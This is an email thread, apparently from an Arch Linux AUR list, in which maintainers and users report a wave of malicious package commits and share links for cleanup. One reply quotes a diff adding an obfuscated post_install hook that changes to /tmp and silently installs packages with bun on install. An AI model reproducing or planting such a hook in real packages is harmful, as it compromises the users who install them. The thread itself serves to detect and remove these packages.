Those too -- but I can't see the malicious commits on HEAD so I assume
somebody took action already.
- 
https://aur.archlinux.org/cgit/aur.git/commit/?h=gulden-appimage&id=8188e5841b9d50384b7dde9136d80fbd1415c818
- 
https://aur.archlinux.org/cgit/aur.git/commit/?h=hack-browser-data-git&id=191ddf65e0337ee9df30d7e643fc13f6cea3f30d
- 
https://aur.archlinux.org/cgit/aur.git/commit/?h=kcmlaptop&id=ff8e6c657a41059abbd833196b18e852453385e4

On Sun, 14 Jun 2026 at 11:21, Nicolas Boichat <[email protected]> wrote:
>
> There's a new wave (detected using my local Gemma E2B model FWIW).
>
> It's a little bit more elaborate:
> https://aur.archlinux.org/cgit/aur.git/commit/?h=htbrowser-bin&id=462c21877fe6d2f563ed6620ef227e06ac8c51c8
>
> diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install
> new file mode 100644
> index 000000000000..9806501accad
> --- /dev/null
> +++ b/htbrowser-bin-deps.install
> @@ -0,0 +1,3 @@
> +post_install() {
> + $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d'
> $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73'
> 'n'"e"'x'"t""f"'i''l''e''-''j''s'
> +}
>
> On Fri, 12 Jun 2026 at 01:47, Jonathan Grotelüschen
> <[email protected]> wrote:
> >
> > Hi everyone,
> >
> > we’re working hard to reset/delete all malicious commits and ban the
> > accounts.
> >
> > If you find more malicious packages, please **send them as a reply to
> > this email** to keep them all in one thread.
> >
> > Thanks!
> >
> > --
> > tippfehlr

Reply via email to